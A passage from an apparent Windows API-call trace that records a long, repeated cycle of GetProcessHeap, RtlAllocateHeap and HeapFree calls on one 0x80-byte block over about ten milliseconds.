GetProcessHeap () returned 0x280000 [0057.970] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.970] GetProcessHeap () returned 0x280000 [0057.970] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.970] GetProcessHeap () returned 0x280000 [0057.970] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.970] GetProcessHeap () returned 0x280000 [0057.970] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.970] GetProcessHeap () returned 0x280000 [0057.970] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.970] GetProcessHeap () returned 0x280000 [0057.970] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.970] GetProcessHeap () returned 0x280000 [0057.970] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.970] GetProcessHeap () returned 0x280000 [0057.970] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.970] GetProcessHeap () returned 0x280000 [0057.970] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.970] GetProcessHeap () returned 0x280000 [0057.970] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.970] GetProcessHeap () returned 0x280000 [0057.970] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.970] GetProcessHeap () returned 0x280000 [0057.970] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.970] GetProcessHeap () returned 0x280000 [0057.970] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.970] GetProcessHeap () returned 0x280000 [0057.970] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.971] GetProcessHeap () returned 0x280000 [0057.971] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.971] GetProcessHeap () returned 0x280000 [0057.971] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.971] GetProcessHeap () returned 0x280000 [0057.971] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.971] GetProcessHeap () returned 0x280000 [0057.971] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.971] GetProcessHeap () returned 0x280000 [0057.971] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.971] GetProcessHeap () returned 0x280000 [0057.971] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.971] GetProcessHeap () returned 0x280000 [0057.971] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.971] GetProcessHeap () returned 0x280000 [0057.971] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.971] GetProcessHeap () returned 0x280000 [0057.971] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.971] GetProcessHeap () returned 0x280000 [0057.971] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.971] GetProcessHeap () returned 0x280000 [0057.971] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.971] GetProcessHeap () returned 0x280000 [0057.971] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.971] GetProcessHeap () returned 0x280000 [0057.971] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.971] GetProcessHeap () returned 0x280000 [0057.971] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.971] GetProcessHeap () returned 0x280000 [0057.971] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.971] GetProcessHeap () returned 0x280000 [0057.971] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.971] GetProcessHeap () returned 0x280000 [0057.971] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.971] GetProcessHeap () returned 0x280000 [0057.971] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.971] GetProcessHeap () returned 0x280000 [0057.971] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.971] GetProcessHeap () returned 0x280000 [0057.971] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.972] GetProcessHeap () returned 0x280000 [0057.972] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.972] GetProcessHeap () returned 0x280000 [0057.972] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.972] GetProcessHeap () returned 0x280000 [0057.972] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.972] GetProcessHeap () returned 0x280000 [0057.972] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.972] GetProcessHeap () returned 0x280000 [0057.972] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.972] GetProcessHeap () returned 0x280000 [0057.972] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.972] GetProcessHeap () returned 0x280000 [0057.972] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.972] GetProcessHeap () returned 0x280000 [0057.972] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.972] GetProcessHeap () returned 0x280000 [0057.972] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.972] GetProcessHeap () returned 0x280000 [0057.972] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.972] GetProcessHeap () returned 0x280000 [0057.972] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.972] GetProcessHeap () returned 0x280000 [0057.972] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.972] GetProcessHeap () returned 0x280000 [0057.972] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.972] GetProcessHeap () returned 0x280000 [0057.972] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.972] GetProcessHeap () returned 0x280000 [0057.972] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.972] GetProcessHeap () returned 0x280000 [0057.972] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.972] GetProcessHeap () returned 0x280000 [0057.972] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.972] GetProcessHeap () returned 0x280000 [0057.972] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.972] GetProcessHeap () returned 0x280000 [0057.972] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.972] GetProcessHeap () returned 0x280000 [0057.973] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.973] GetProcessHeap () returned 0x280000 [0057.973] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.973] GetProcessHeap () returned 0x280000 [0057.973] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.973] GetProcessHeap () returned 0x280000 [0057.973] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.973] GetProcessHeap () returned 0x280000 [0057.973] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.973] GetProcessHeap () returned 0x280000 [0057.973] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.973] GetProcessHeap () returned 0x280000 [0057.973] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.973] GetProcessHeap () returned 0x280000 [0057.973] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.973] GetProcessHeap () returned 0x280000 [0057.973] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.973] GetProcessHeap () returned 0x280000 [0057.973] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.973] GetProcessHeap () returned 0x280000 [0057.973] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.973] GetProcessHeap () returned 0x280000 [0057.973] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.973] GetProcessHeap () returned 0x280000 [0057.973] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.973] GetProcessHeap () returned 0x280000 [0057.973] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.973] GetProcessHeap () returned 0x280000 [0057.973] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.973] GetProcessHeap () returned 0x280000 [0057.973] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.973] GetProcessHeap () returned 0x280000 [0057.973] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.973] GetProcessHeap () returned 0x280000 [0057.973] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.973] GetProcessHeap () returned 0x280000 [0057.973] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.973] GetProcessHeap () returned 0x280000 [0057.973] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.974] GetProcessHeap () returned 0x280000 [0057.974] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.974] GetProcessHeap () returned 0x280000 [0057.974] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.974] GetProcessHeap () returned 0x280000 [0057.974] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.974] GetProcessHeap () returned 0x280000 [0057.974] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.974] GetProcessHeap () returned 0x280000 [0057.974] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.974] GetProcessHeap () returned 0x280000 [0057.974] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.974] GetProcessHeap () returned 0x280000 [0057.974] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.974] GetProcessHeap () returned 0x280000 [0057.974] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.974] GetProcessHeap () returned 0x280000 [0057.974] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.974] GetProcessHeap () returned 0x280000 [0057.974] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.974] GetProcessHeap () returned 0x280000 [0057.974] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.974] GetProcessHeap () returned 0x280000 [0057.974] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.974] GetProcessHeap () returned 0x280000 [0057.974] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.974] GetProcessHeap () returned 0x280000 [0057.974] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.974] GetProcessHeap () returned 0x280000 [0057.974] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.974] GetProcessHeap () returned 0x280000 [0057.974] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.974] GetProcessHeap () returned 0x280000 [0057.974] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.974] GetProcessHeap () returned 0x280000 [0057.974] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.974] GetProcessHeap () returned 0x280000 [0057.974] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.974] GetProcessHeap () returned 0x280000 [0057.975] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.975] GetProcessHeap () returned 0x280000 [0057.975] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.975] GetProcessHeap () returned 0x280000 [0057.975] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.975] GetProcessHeap () returned 0x280000 [0057.975] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.975] GetProcessHeap () returned 0x280000 [0057.975] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.975] GetProcessHeap () returned 0x280000 [0057.975] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.975] GetProcessHeap () returned 0x280000 [0057.975] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.975] GetProcessHeap () returned 0x280000 [0057.975] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.975] GetProcessHeap () returned 0x280000 [0057.975] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.975] GetProcessHeap () returned 0x280000 [0057.975] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.975] GetProcessHeap () returned 0x280000 [0057.975] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.975] GetProcessHeap () returned 0x280000 [0057.975] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.975] GetProcessHeap () returned 0x280000 [0057.975] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.975] GetProcessHeap () returned 0x280000 [0057.975] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.975] GetProcessHeap () returned 0x280000 [0057.975] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.975] GetProcessHeap () returned 0x280000 [0057.975] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.975] GetProcessHeap () returned 0x280000 [0057.975] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.975] GetProcessHeap () returned 0x280000 [0057.975] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.975] GetProcessHeap () returned 0x280000 [0057.975] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.975] GetProcessHeap () returned 0x280000 [0057.975] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.976] GetProcessHeap () returned 0x280000 [0057.976] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.976] GetProcessHeap () returned 0x280000 [0057.976] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.976] GetProcessHeap () returned 0x280000 [0057.976] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.976] GetProcessHeap () returned 0x280000 [0057.976] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.976] GetProcessHeap () returned 0x280000 [0057.976] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.976] GetProcessHeap () returned 0x280000 [0057.976] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.976] GetProcessHeap () returned 0x280000 [0057.976] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.976] GetProcessHeap () returned 0x280000 [0057.976] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.976] GetProcessHeap () returned 0x280000 [0057.976] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.976] GetProcessHeap () returned 0x280000 [0057.976] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.976] GetProcessHeap () returned 0x280000 [0057.976] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.976] GetProcessHeap () returned 0x280000 [0057.976] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.976] GetProcessHeap () returned 0x280000 [0057.976] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.976] GetProcessHeap () returned 0x280000 [0057.976] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.976] GetProcessHeap () returned 0x280000 [0057.976] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.976] GetProcessHeap () returned 0x280000 [0057.976] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.976] GetProcessHeap () returned 0x280000 [0057.976] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.976] GetProcessHeap () returned 0x280000 [0057.976] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.976] GetProcessHeap () returned 0x280000 [0057.976] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.976] GetProcessHeap () returned 0x280000 [0057.977] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.977] GetProcessHeap () returned 0x280000 [0057.977] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.977] GetProcessHeap () returned 0x280000 [0057.977] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.977] GetProcessHeap () returned 0x280000 [0057.977] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.977] GetProcessHeap () returned 0x280000 [0057.977] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.977] GetProcessHeap () returned 0x280000 [0057.977] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.977] GetProcessHeap () returned 0x280000 [0057.977] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.977] GetProcessHeap () returned 0x280000 [0057.977] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.977] GetProcessHeap () returned 0x280000 [0057.977] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.977] GetProcessHeap () returned 0x280000 [0057.977] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.977] GetProcessHeap () returned 0x280000 [0057.977] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.977] GetProcessHeap () returned 0x280000 [0057.977] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.977] GetProcessHeap () returned 0x280000 [0057.977] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.977] GetProcessHeap () returned 0x280000 [0057.977] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.977] GetProcessHeap () returned 0x280000 [0057.977] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.977] GetProcessHeap () returned 0x280000 [0057.977] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.977] GetProcessHeap () returned 0x280000 [0057.977] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.977] GetProcessHeap () returned 0x280000 [0057.977] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.977] GetProcessHeap () returned 0x280000 [0057.977] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.977] GetProcessHeap () returned 0x280000 [0057.977] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.977] GetProcessHeap () returned 0x280000 [0057.978] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.978] GetProcessHeap () returned 0x280000 [0057.978] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.978] GetProcessHeap () returned 0x280000 [0057.978] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.978] GetProcessHeap () returned 0x280000 [0057.978] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.978] GetProcessHeap () returned 0x280000 [0057.978] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.978] GetProcessHeap () returned 0x280000 [0057.978] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.978] GetProcessHeap () returned 0x280000 [0057.978] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.978] GetProcessHeap () returned 0x280000 [0057.978] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.978] GetProcessHeap () returned 0x280000 [0057.978] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.978] GetProcessHeap () returned 0x280000 [0057.978] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.978] GetProcessHeap () returned 0x280000 [0057.978] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.978] GetProcessHeap () returned 0x280000 [0057.978] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.978] GetProcessHeap () returned 0x280000 [0057.978] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.978] GetProcessHeap () returned 0x280000 [0057.978] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.978] GetProcessHeap () returned 0x280000 [0057.978] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.978] GetProcessHeap () returned 0x280000 [0057.978] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.978] GetProcessHeap () returned 0x280000 [0057.978] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.978] GetProcessHeap () returned 0x280000 [0057.978] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.978] GetProcessHeap () returned 0x280000 [0057.978] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.978] GetProcessHeap () returned 0x280000 [0057.978] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.978] GetProcessHeap () returned 0x280000 [0057.979] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.979] GetProcessHeap () returned 0x280000 [0057.979] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.979] GetProcessHeap () returned 0x280000 [0057.979] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.979] GetProcessHeap () returned 0x280000 [0057.979] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.979] GetProcessHeap () returned 0x280000 [0057.979] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.979] GetProcessHeap () returned 0x280000 [0057.979] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.979] GetProcessHeap () returned 0x280000 [0057.979] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.979] GetProcessHeap () returned 0x280000 [0057.979] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.979] GetProcessHeap () returned 0x280000 [0057.979] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.979] GetProcessHeap () returned 0x280000 [0057.979] HeapFree (in: hHeap=0x280000, dwFlags=0x0, 